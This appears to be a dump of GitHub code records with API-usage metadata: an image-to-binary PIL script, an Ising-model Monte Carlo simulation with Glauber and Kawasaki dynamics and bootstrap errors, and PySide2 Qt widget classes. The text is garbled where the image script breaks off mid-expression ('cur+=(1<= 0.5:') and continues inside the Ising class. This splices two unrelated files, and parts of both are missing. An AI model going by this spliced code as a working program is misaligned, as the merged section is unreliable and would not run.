"matplotlib.patches", "line_number": 205, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 211, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 212, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 212, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 213, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 213, "usage_type": "name"}, {"api_name": "cv2.cvtColor", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 234, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 234, "usage_type": "attribute"}, {"api_name": "cv2.COLOR_BGR2RGB", "line_number": 234, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 239, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 239, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 251, "usage_type": "call"}, {"api_name": "os.path", "line_number": 251, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path.isfile", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": "cv2.resize", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 265, "usage_type": "call"}, {"api_name": "cv2.IMREAD_COLOR", "line_number": 265, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 266, "usage_type": "call"}, {"api_name": "os.path", "line_number": 266, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 266, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 267, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 279, "usage_type": "call"}, {"api_name": "os.path", "line_number": 279, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 279, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 280, "usage_type": "call"}, {"api_name": "parallel.ParallelExecutor", "line_number": 282, "usage_type": "call"}, {"api_name": "joblib.delayed", "line_number": 288, "usage_type": "call"}]} +{"seq_id": "70143169154", "text": "from PIL import Image\nimport numpy as np\n\nimg = Image.open(\"./images/bunny.png\")\nimg = img.convert(\"L\").convert(\"1\")\nimg.save(\"./images/binary_image.png\")\nimarr = np.asarray(img,dtype = np.int8)\nf = open(\"imagedata.txt\",\"w\")\ncur = 0\ncnt = 0\nfor i in range(imarr.shape[0]):\n for j in range(imarr.shape[1]):\n if(imarr[i][j]==1):\n cur+=(1<= 0.5:\r\n self.lattice[i][j] = 1.0\r\n else:\r\n self.lattice[i][j] = -1.0\r\n\r\n\r\n \"\"\"Impliment periodic boundary conditions \"\"\"\r\n def pbc(self, i):\r\n\r\n if (i > self.shape-1) or (i<0):\r\n i = np.mod(i, self.shape)\r\n return i\r\n else:\r\n return i\r\n\r\n########## Calculate properties of lattice ##########\r\n\r\n \"\"\"Calculate total magnetisation \"\"\"\r\n def total_mag(self):\r\n\r\n self.mag = np.abs(np.sum(self.lattice))\r\n return self.mag\r\n\r\n \"\"\"Calculate total energy\"\"\"\r\n def total_energy(self):\r\n\r\n e_tot = 0.0\r\n for i in range(self.shape):\r\n for j in range(self.shape):\r\n #Energy at each site is -J sum nearest neighbours (J=1 in this sim)\r\n e_ij = 0.0\r\n e_ij += self.lattice[self.pbc(i+1)][j]\r\n e_ij += self.lattice[i][self.pbc(j-1)]\r\n e_ij = -1*e_ij*self.lattice[i][j]\r\n e_tot += e_ij\r\n return e_tot\r\n\r\n \"\"\"Calculate Heat Capacity\"\"\"\r\n def heat_capacity(self, e, e_sqr):\r\n return (e_sqr-e**2.0)/((self.temp**2.0)*(self.shape*self.shape))\r\n\r\n \"\"\"Calculate Suseptability\"\"\"\r\n def chi(self, m, m_sqr):\r\n return (m_sqr-m**2.0)/((self.temp*self.shape)**2.0)\r\n\r\n########## Impliment Glauber dynamics #########\r\n\r\n \"\"\"Use Glauber dynamics to pick which lattice site to change\"\"\"\r\n def glauber(self):\r\n\r\n i = np.random.randint(self.shape)\r\n j = np.random.randint(self.shape)\r\n self.glauber_energy(i,j)\r\n\r\n \"\"\"Work out the energy difference caused by the change\"\"\"\r\n def glauber_energy(self, i, j):\r\n\r\n e_new = 0.0\r\n e_new += self.lattice[self.pbc(i-1)][j]\r\n e_new += self.lattice[self.pbc(i+1)][j]\r\n e_new += self.lattice[i][self.pbc(j+1)]\r\n e_new += self.lattice[i][self.pbc(j-1)]\r\n # Swap sign so energy change is just 2x the new energy\r\n self.delta_e = 2*e_new*self.lattice[i][j]\r\n self.glauber_metropolis_test(i, j)\r\n\r\n \"\"\"Run the Metropolis Test to determine if the spin should be flipped\"\"\"\r\n def glauber_metropolis_test(self, i, j):\r\n\r\n #If energy state if preferable make the flip\r\n if self.delta_e <= 0:\r\n self.lattice[i][j] *= -1.0\r\n\r\n #If not flip is accepted with prob exp(-deltaE/k_B T)\r\n else:\r\n random_number = np.random.random()\r\n probability = math.exp(-1.0*(self.delta_e/self.temp))\r\n if random_number <= probability:\r\n self.lattice[i][j] *= -1.0\r\n\r\n\r\n########## Impliment Kawasaki dynamics #########\r\n\r\n \"\"\"Use Kawasaki dynamics to pick two random lattice sites to swap \"\"\"\r\n def kawasaki(self):\r\n\r\n i1 = np.random.randint(self.shape)\r\n i2 = np.random.randint(self.shape)\r\n j1 = np.random.randint(self.shape)\r\n j2 = np.random.randint(self.shape)\r\n\r\n #Keep doing random selection if the sites match\r\n while (i1==i2) and (j1==j2):\r\n i1 = np.random.randint(self.shape)\r\n i2 = np.random.randint(self.shape)\r\n j1 = np.random.randint(self.shape)\r\n j2 = np.random.randint(self.shape)\r\n\r\n #If the sites have the opposite spin swap them\r\n if self.lattice[i1][j1] != self.lattice[i2][j2]:\r\n self.kawasaki_energy(i1, i2, j1, j2)\r\n\r\n \"\"\"Work out the energy difference caused by the change\"\"\"\r\n def kawasaki_energy(self, i1, i2, j1, j2):\r\n\r\n #Calculate energy at both sites\r\n E1 = 0.0\r\n E1 += self.lattice[self.pbc(i1+1)][j1]\r\n E1 += self.lattice[self.pbc(i1-1)][j1]\r\n E1 += self.lattice[i1][self.pbc(j1+1)]\r\n E1 += self.lattice[i1][self.pbc(j1-1)]\r\n E1 = 2*E1*self.lattice[i1][j1]\r\n\r\n E2 = 0.0\r\n E2 += self.lattice[self.pbc(i2+1)][j2]\r\n E2 += self.lattice[self.pbc(i2-1)][j2]\r\n E2 += self.lattice[i2][self.pbc(j2+1)]\r\n E2 += self.lattice[i2][self.pbc(j2-1)]\r\n E2 = 2*E2*self.lattice[i2][j2]\r\n\r\n #Calculate delta_e\r\n self.delta_e = E1 + E2\r\n\r\n #Account for double counting nearest neighbours\r\n if (i1 == i2) and ((j1 == np.mod(j2+1, self.shape)) or (j1 == np.mod(j2-1, self.shape))):\r\n self.delta_e -= 2.0\r\n elif (j1 == j2) and ((i1 == np.mod(i2+1, self.shape)) or (i1 == np.mod(i2-1, self.shape))):\r\n self.delta_e -= 2.0\r\n\r\n self.kawasaki_metropolis_test(i1, i2, j1, j2)\r\n\r\n \"\"\"Run the Metropolis Test to determine if the spin should be flipped\"\"\"\r\n def kawasaki_metropolis_test(self, i1, i2, j1, j2):\r\n\r\n #If energy state if preferable make the flip\r\n if self.delta_e <= 0:\r\n self.lattice[i1][j1] *= -1.0\r\n self.lattice[i2][j2] *= -1.0\r\n\r\n #If not flip is accepted with prob exp(-deltaE/k_B T)\r\n else:\r\n random_number = np.random.random()\r\n probability = math.exp(-1.0*(self.delta_e/self.temp))\r\n if random_number <= probability:\r\n self.lattice[i1][j1] *= -1.0\r\n self.lattice[i2][j2] *= -1.0\r\n\r\n########## Calculate Errors ##########\r\n\r\n \"\"\"Calculate standard error on the mean (used for E and Mag)\"\"\"\r\n def standard_error(self, values, values_sqr, list):\r\n return math.sqrt((values_sqr-values**2.0)/len(list))\r\n\r\n \"\"\"Use bootstrap method to Calculate errors (used for Heat Capacity and Chi)\"\"\"\r\n def bootstrap_error(self, input, input_sqr, mode):\r\n\r\n #List for sample data poins\r\n values = []\r\n values_sqr = []\r\n\r\n #Randomly sample 101 times \r\n for n in range(101):\r\n #Select indices\r\n samples = [np.random.randint(len(input)) for i in range(len(input))]\r\n #Select correspoinding data\r\n input_samples = [input[sample] for sample in samples]\r\n input_sqr_samples = [input_sqr[sample] for sample in samples]\r\n\r\n #Find means\r\n sample_mean = np.mean(input_samples)\r\n sample_sqr_mean = np.mean(input_sqr_samples)\r\n \r\n #Find values\r\n if mode == 'Heat Capacity':\r\n value = self.heat_capacity(sample_mean, sample_sqr_mean)\r\n elif mode == 'Chi':\r\n value = self.chi(sample_mean, sample_sqr_mean)\r\n\r\n values.append(value)\r\n values_sqr.append(value**2.0)\r\n \r\n \r\n #Find error\r\n mean = np.mean(values)\r\n mean_sqr = np.mean(values_sqr)\r\n\r\n error = math.sqrt(mean_sqr-mean**2.0)\r\n\r\n return error\r\n\r\n########## Data Collection ##########\r\n\r\n def data_collection(self):\r\n\r\n # Set up data collection lists\r\n cv = []\r\n chi = []\r\n cv_error = []\r\n chi_error = []\r\n e_mean = []\r\n mag_mean = []\r\n e_error = []\r\n mag_error = []\r\n\r\n #Create list of temps\r\n temp_range = np.arange(1.0, 3.25, 0.25)\r\n\r\n for T in reversed(temp_range):\r\n self.temp = T\r\n print(f'\\n Temperature = {T} \\n')\r\n #Only need to create an inital lattice, subsequent temps can use last sweep from previous temp\r\n if T == temp_range[-1]:\r\n self.create_lattice()\r\n\r\n #collect data for Errors\r\n e_values = []\r\n e_sqr_values = []\r\n mag_values = []\r\n mag_sqr_values = []\r\n\r\n #run for set number of sweeps\r\n for i in range(self.sweeps):\r\n #in each seep need to complete a test for every site in lattice\r\n for n in range(self.shape*self.shape):\r\n if self.method == 'Glauber':\r\n self.glauber()\r\n elif self.method == 'Kawasaki':\r\n self.kawasaki()\r\n if i ==0:\r\n e = self.total_energy()\r\n e_values.append(e)\r\n e_sqr_values.append(e**2.0)\r\n mag = self.total_mag()\r\n mag_values.append(mag)\r\n mag_sqr_values.append(mag**2.0)\r\n\r\n #Leave for 100 sweeps to equilibiriate\r\n if i >100:\r\n #Every 10 sweeps collect data\r\n if i%10==0:\r\n e = self.total_energy()\r\n e_values.append(e)\r\n e_sqr_values.append(e**2.0)\r\n mag = self.total_mag()\r\n mag_values.append(mag)\r\n mag_sqr_values.append(mag**2.0)\r\n\r\n print(f'Sweep: {i}, Energy = {e}, Mag = {mag}')\r\n\r\n #At the end of all sweeps calculate means\r\n energy_mean = np.mean(e_values)\r\n energy_sqr_mean = np.mean(e_sqr_values)\r\n\r\n m_mean = np.mean(mag_values)\r\n m_sqr_mean = np.mean(mag_sqr_values)\r\n\r\n # Append to lists\r\n e_mean.append(energy_mean)\r\n mag_mean.append(m_mean)\r\n\r\n #Calculate Cv and Chi\r\n cv.append(self.heat_capacity(energy_mean, energy_sqr_mean))\r\n chi.append(self.chi(m_mean, m_sqr_mean))\r\n\r\n #Calculate errors\r\n e_error.append(self.standard_error(energy_mean, energy_sqr_mean, e_values))\r\n mag_error.append(self.standard_error(m_mean, m_sqr_mean, mag_values))\r\n cv_error.append(self.bootstrap_error(e_values, e_sqr_values, mode='Heat Capacity'))\r\n chi_error.append(self.bootstrap_error(mag_values, mag_sqr_values, mode='Chi'))\r\n\r\n #Write all data to files\r\n self.write_files(e_mean, e_error, mag_mean, mag_error, cv, cv_error, chi, chi_error, temp_range)\r\n\r\n \"\"\"Write all data to .dat files \"\"\"\r\n def write_files(self, e, e_error, mag, mag_error, cv, cv_error, chi, chi_error, T):\r\n\r\n energy_file = open('energy_output.dat', 'w')\r\n mag_file = open('mag_output.dat', 'w')\r\n cv_file = open('cv_output.dat', 'w')\r\n chi_file= open('chi_output.dat', 'w')\r\n\r\n for i in range(len(T)):\r\n energy_file.write(str(T[i]) + ',')\r\n energy_file.write(str(np.flip(e)[i]) + ',')\r\n energy_file.write(str(np.flip(e_error)[i]) + '\\n')\r\n\r\n mag_file.write(str(T[i]) + ',')\r\n mag_file.write(str(np.flip(mag)[i]) + ',')\r\n mag_file.write(str(np.flip(mag_error)[i]) + '\\n')\r\n\r\n cv_file.write(str(T[i]) + ',')\r\n cv_file.write(str(np.flip(cv)[i]) + ',')\r\n cv_file.write(str(np.flip(cv_error)[i]) + '\\n')\r\n\r\n chi_file.write(str(T[i]) + ',')\r\n chi_file.write(str(np.flip(chi)[i]) + ',')\r\n chi_file.write(str(np.flip(chi_error)[i]) + '\\n')\r\n\r\n energy_file.close()\r\n mag_file.close()\r\n cv_file.close()\r\n chi_file.close()\r\n\r\n########## Run animation #########\r\n\r\n def update(self):\r\n\r\n for i in range(self.shape*self.shape):\r\n if self.method == 'Glauber':\r\n self.glauber()\r\n elif self.method == 'Kawasaki':\r\n self.kawasaki()\r\n\r\n def animate(self, i):\r\n self.update()\r\n self.mat.set_data(self.lattice)\r\n return self.mat,\r\n\r\n def run_animation(self):\r\n fig, ax = plt.subplots()\r\n self.mat = ax.imshow(self.lattice, cmap = 'seismic')\r\n ani = FuncAnimation(fig, self.animate, interval= 1, blit = False)\r\n\r\n plt.show()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n if len(sys.argv) != 6:\r\n print(\"Incorrect Number of Arguments Presented.\")\r\n print(\"Usage: \" + sys.argv[0] + \"Method, Lattice Size, Temperature, Sweeps, Data/Animate\")\r\n quit()\r\n elif sys.argv[1] not in ['Glauber', 'Kawasaki']:\r\n print(\"Please enter either Glauber or Kawasaki\")\r\n quit()\r\n elif sys.argv[5] not in ['Data', 'Animate']:\r\n print('Please enter either Data or animate')\r\n quit()\r\n else:\r\n method = sys.argv[1]\r\n shape = int(sys.argv[2])\r\n temp = float(sys.argv[3])\r\n sweeps = int(sys.argv[4])\r\n\r\n ising_model = IsingModel(method, shape, temp, sweeps)\r\n if sys.argv[5] == 'Data':\r\n ising_model.data_collection()\r\n if sys.argv[5] == 'Animate':\r\n ising_model.run_animation()\r\n", "repo_name": "LJBMyco/Ising_Model", "sub_path": "ising.py", "file_name": "ising.py", "file_ext": "py", "file_size_in_byte": 13205, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "numpy.random.seed", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 11, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 31, "usage_type": "attribute"}, {"api_name": "numpy.mod", "line_number": 42, "usage_type": "call"}, {"api_name": "numpy.abs", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.sum", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 82, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 83, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 83, "usage_type": "attribute"}, {"api_name": "numpy.random.random", "line_number": 107, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 107, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 108, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 119, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 120, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 121, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 125, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 126, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 126, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 127, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 127, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 128, "usage_type": "attribute"}, {"api_name": "numpy.mod", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.mod", "line_number": 158, "usage_type": "call"}, {"api_name": "numpy.random.random", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 173, "usage_type": "attribute"}, {"api_name": "math.exp", "line_number": 174, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.random.randint", "line_number": 195, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 195, "usage_type": "attribute"}, {"api_name": "numpy.mean", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 202, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 215, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 216, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 218, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 237, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 282, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 283, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 285, "usage_type": "call"}, {"api_name": "numpy.mean", "line_number": 286, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 315, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 316, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 319, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 320, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 323, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 324, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 327, "usage_type": "call"}, {"api_name": "numpy.flip", "line_number": 328, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 351, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 351, "usage_type": "name"}, {"api_name": "matplotlib.animation.FuncAnimation", "line_number": 353, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 355, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 355, "usage_type": "name"}, {"api_name": "sys.argv", "line_number": 359, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 361, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 363, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 366, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 370, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 371, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 372, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 373, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 376, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 378, "usage_type": "attribute"}]} +{"seq_id": "25995817332", "text": "from PySide2 import QtCore, QtGui, QtWidgets\n\nfrom my_qt.table_widgets import BatteryNeedTable, BOSNeedTable, InverterNeedTable, PanelNeedTable, \\\n StructureNeedTable, BatteryQuotationTable, BOSQuotationTable, InverterQuotationTable, PanelQuotationTable, \\\n StructureQuotationTable, RelatedPanelQuotationTable, StaffTable\nfrom resources import url_plus\n\n\n# noinspection PyPep8Naming\nclass BaseGroup(QtWidgets.QGroupBox):\n def __init__(self, parent, my_strings, title, TableClass):\n super().__init__(parent)\n self.my_strings = my_strings\n self.title = title\n self.table = TableClass(self, self.my_strings)\n self.label = QtWidgets.QLabel(self)\n\n self.setup_gui()\n\n def setup_gui(self):\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setUnderline(False)\n font.setBold(True)\n self.setFont(font)\n self.setObjectName('group')\n self.vertical_layout = QtWidgets.QVBoxLayout(self)\n self.vertical_layout.setContentsMargins(6, 6, 6, 6)\n self.vertical_layout.setObjectName('vertical_layout')\n self.vertical_layout.addWidget(self.table)\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.label.setFont(font)\n self.label.setObjectName('label')\n self.vertical_layout.addWidget(self.label)\n\n self.setTitle(self.title)\n self.label.setText(f'{self.my_strings.label_found}:')\n\n def load_items(self, items):\n if items:\n self.show()\n self.table.load_table_data(items)\n self.table.show_all_rows()\n self.table.resizeColumnsToContents()\n self.update_label_found()\n else:\n self.hide()\n\n def show_rows(self, indices):\n if indices:\n self.show()\n self.table.show_rows(indices)\n self.update_label_found()\n else:\n self.hide()\n\n def remove_row(self, item_id):\n for i in range(self.table.rowCount()):\n if item_id == self.table.item(i, 0).item_id:\n self.table.removeRow(i)\n break\n self.update_label_found()\n\n def update_label_found(self):\n self.label.setText(f'{self.my_strings.label_found}: {self.table.visible_row_count}')\n\n\nclass VisibleGroup(BaseGroup):\n def load_items(self, items):\n if items:\n self.table.show()\n self.table.load_table_data(items)\n self.table.show_all_rows()\n self.table.resizeColumnsToContents()\n self.update_label_found()\n else:\n self.table.hide()\n self.table.visible_row_count = 0\n self.update_label_found()\n\n\n# ---------------------------\n# ---------- Needs ----------\n# ---------------------------\nclass BatteryNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_batteries, BatteryNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_battery_need,\n function_delete=controller.delete_battery_need)\n\n\nclass BOSNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_bos, BOSNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_bos_need,\n function_delete=controller.delete_bos_need)\n\n\nclass InverterNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_inverters, InverterNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_inverter_need,\n function_delete=controller.delete_inverter_need)\n\n\nclass PanelNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_panels, PanelNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_panel_need,\n function_delete=controller.delete_panel_need)\n\n\nclass StructureNeedGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_structures, StructureNeedTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_structure_need,\n function_delete=controller.delete_structure_need)\n\n\n# --------------------------------\n# ---------- Quotations ----------\n# --------------------------------\nclass BatteryQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_batteries, BatteryQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_battery_quotation,\n function_delete=controller.delete_battery_quotation)\n\n\nclass BOSQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_bos, BOSQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_bos_quotation,\n function_delete=controller.delete_bos_quotation)\n\n\nclass InverterQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_inverters, InverterQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_inverter_quotation,\n function_delete=controller.delete_inverter_quotation)\n\n\nclass PanelQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_panels, PanelQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_panel_quotation,\n function_delete=controller.delete_panel_quotation)\n\n\nclass StructureQuotationGroup(BaseGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_structures, StructureQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.c_master.setup_structure_quotation,\n function_delete=controller.delete_structure_quotation)\n\n\n# ----------------------------------------\n# ---------- Related quotations ----------\n# ----------------------------------------\nclass RelatedPanelQuotationGroup(VisibleGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_related_panel_quotations, RelatedPanelQuotationTable)\n\n def connect_signals(self, controller):\n self.table.connect_signals(function_double_click=controller.double_clicked_table_rel,\n function_delete=None)\n\n def load_items(self, items):\n if items:\n self.table.show()\n self.table.load_table_data(items)\n self.table.show_all_rows()\n self.table.resizeColumnsToContents()\n self.update_label_found()\n else:\n self.table.hide()\n self.table.visible_row_count = 0\n self.update_label_found()\n\n\n# ---------------------------\n# ---------- Staff ----------\n# ---------------------------\nclass StaffGroup(VisibleGroup):\n def __init__(self, parent, my_strings):\n super().__init__(parent, my_strings, my_strings.group_staff, StaffTable)\n\n def setup_gui(self):\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(75)\n font.setUnderline(False)\n font.setBold(True)\n self.setFont(font)\n self.setObjectName('group')\n self.vertical_layout = QtWidgets.QVBoxLayout(self)\n self.vertical_layout.setContentsMargins(6, 6, 6, 6)\n self.vertical_layout.setObjectName('vertical_layout')\n self.vertical_layout.addWidget(self.table)\n self.horizontal_layout = QtWidgets.QHBoxLayout()\n self.horizontal_layout.setObjectName('horizontal_layout')\n self.label = QtWidgets.QLabel(self)\n font = QtGui.QFont()\n font.setPointSize(11)\n font.setWeight(50)\n font.setBold(False)\n self.label.setFont(font)\n self.label.setAlignment(QtCore.Qt.AlignLeading | QtCore.Qt.AlignLeft | QtCore.Qt.AlignTop)\n self.label.setObjectName('label')\n self.horizontal_layout.addWidget(self.label)\n self.button_add_employee = QtWidgets.QPushButton(self)\n self.button_add_employee.setMinimumSize(QtCore.QSize(50, 30))\n self.button_add_employee.setMaximumSize(QtCore.QSize(50, 30))\n font = QtGui.QFont()\n font.setPointSize(12)\n font.setWeight(50)\n font.setBold(False)\n self.button_add_employee.setFont(font)\n self.button_add_employee.setObjectName('button_add_employee')\n self.horizontal_layout.addWidget(self.button_add_employee)\n self.vertical_layout.addLayout(self.horizontal_layout)\n\n self.setTitle(self.title)\n self.label.setText(f'{self.my_strings.label_total}:')\n self.button_add_employee.setIcon(QtGui.QIcon(url_plus))\n self.button_add_employee.setIconSize(QtCore.QSize(12, 12))\n\n def connect_signals(self, controller):\n self.button_add_employee.clicked.connect(controller.clicked_add_employee)\n\n self.table.connect_signals(function_double_click=controller.clicked_add_employee,\n function_delete=controller.delete_employee)\n", "repo_name": "AlberLC/complete-qt-app", "sub_path": "my_qt/group_boxes.py", "file_name": "group_boxes.py", "file_ext": "py", "file_size_in_byte": 10218, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "PySide2.QtWidgets.QGroupBox", "line_number": 10, "usage_type": "attribute"}, {"api_name": "PySide2.QtWidgets", "line_number": 10, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 16, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 16, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 21, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 21, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 28, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 28, "usage_type": "name"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 32, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 32, "usage_type": "name"}, {"api_name": "my_qt.table_widgets.BatteryNeedTable", "line_number": 91, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.BOSNeedTable", "line_number": 100, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.InverterNeedTable", "line_number": 109, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.PanelNeedTable", "line_number": 118, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.StructureNeedTable", "line_number": 127, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.BatteryQuotationTable", "line_number": 139, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.BOSQuotationTable", "line_number": 148, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.InverterQuotationTable", "line_number": 157, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.PanelQuotationTable", "line_number": 166, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.StructureQuotationTable", "line_number": 175, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.RelatedPanelQuotationTable", "line_number": 187, "usage_type": "argument"}, {"api_name": "my_qt.table_widgets.StaffTable", "line_number": 211, "usage_type": "argument"}, {"api_name": "PySide2.QtGui.QFont", "line_number": 214, "usage_type": "call"}, {"api_name": "PySide2.QtGui", "line_number": 214, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QVBoxLayout", "line_number": 221, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 221, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QHBoxLayout", "line_number": 225, "usage_type": "call"}, {"api_name": "PySide2.QtWidgets", "line_number": 225, "usage_type": "name"}, {"api_name": "PySide2.QtWidgets.QLabel", "line_number": 227, "usage_type": "call"}, 